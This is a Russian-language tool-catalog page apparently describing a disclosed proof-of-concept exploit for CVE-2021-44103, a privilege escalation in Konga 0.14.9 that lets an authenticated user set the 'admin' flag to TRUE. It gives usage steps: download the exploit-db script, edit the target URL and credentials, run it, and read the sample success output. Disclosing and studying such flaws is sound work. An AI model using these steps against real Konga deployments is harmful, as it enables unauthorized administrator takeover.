Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/paulotrindadec/cve-2021-44103
Повышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеБезопасность API
GitHubpaulotrindadec/cve-2021-44103

CVE-2021-44103

Репозиторий
33 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-44103

Концепт-эксплойт для KONGA 0.14.9 — повышение привилегий.

Введение

16 ноября 2021 года Fabrício Salomão и я обнаружили уязвимость в Konga API Gateways, позволяющую любому аутентифицированному пользователю стать администратором.

Сообщение об уязвимости

Продукт: KONGA
Модель: 0.14.9
Уязвимость: повышение привилегий
Воздействие: полный доступ администратора (вертикальное повышение привилегий)
Аутентификация: требуется
Автор эксплойта: Fabricio Salomao / Paulo Trindade

PoC

Ниже создан обычный пользователь с именем "usernormal" без привилегий.

Crash

Crash

С помощью приведённого ниже запроса флаг "FALSE" в параметре "admin" был изменён на "TRUE".

Crash

Поэтому для нас был создан эксплойт: https://www.exploit-db.com/exploits/50521

Crash

После запуска эксплойта повышение привилегий прошло успешно!

Результат:

Crash

Запуск эксплойта

root@kitploit:~
wget https://www.exploit-db.com/raw/50521 -O 50521.py

Edit 50521.py

Modify:

urlkonga = "http://www.example.com:1337/" # change to your konga address
identifier = "usernormalkonga"            # change user
password = "changeme"                     # change password

Execute:

python 50521.py

[+] Attack
[+] Token eyJhbGciOiJIUzI1NiJ9.MTA.JFmJ0Vd3z5oeOTokSL0qfPZSOJmnZKEjZVzCJs_AM-U
[+] Change Normal User to Admin
[+] Success

Ссылки

http://n0hat.blogspot.com/2021/11/konga-0149-privilege-escalation-exploit.html

https://www.exploit-db.com/exploits/50521

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44103

https://github.com/advisories/GHSA-f2mp-8fgg-7465

https://security.snyk.io/vuln/SNYK-JS-KONGA-2434821

https://twitter.com/CVEnew/status/1508455166885961732

https://twitter.com/search?q=CVE-2021-44103&src=typed_query

Скачать инструмент